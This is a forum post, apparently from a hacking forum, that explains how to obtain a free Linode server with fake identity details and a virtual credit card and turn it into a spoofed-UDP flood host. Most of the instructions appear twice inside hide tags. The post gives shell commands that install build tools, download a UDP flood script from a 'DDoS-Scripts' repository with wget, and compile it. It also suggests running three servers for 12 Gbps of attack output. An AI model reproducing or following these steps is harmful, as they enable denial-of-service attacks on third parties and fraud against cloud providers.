How to get free server for SST purposes. 05-06-2022, 03:36 PM
#1
You need:
[hide]
1. Fake information
2. VCC with $1 on it
3. An SSH client.
Go sign up for linode, you get $100 worth of credit, use a VDS not a VPS or you will get suspended. Doesn't work with AMP scripts.
Create an instance, and install CentOS 7.
Run the following commands
Next us wget it likely will not be installed by default so just run
I recommend getting 3 of the 4 GB servers for a total output of 12 GBps. But now you have a server that uses spoofed udp.
[/hide]
[hide]
1. Fake information
2. VCC with $1 on it
3. An SSH client.
Go sign up for linode, you get $100 worth of credit, use a VDS not a VPS or you will get suspended. Doesn't work with AMP scripts.
Create an instance, and install CentOS 7.
Run the following commands
Code:
sudo yum install gcc
sudo yum update
sudo yum install cpan -y
cpan
install Net::RawIP
Next us wget it likely will not be installed by default so just run
Code:
yum install wget -y
then download the script with
wget https://raw.githubusercontent.com/vbooter/DDoS-Scripts/master/UDP.c
chmod +x UDP.c
gcc UDP.c -o udpflood -pthread
I recommend getting 3 of the 4 GB servers for a total output of 12 GBps. But now you have a server that uses spoofed udp.
[/hide]
(This post was last modified: 05-07-2022, 02:31 AM by PYA.)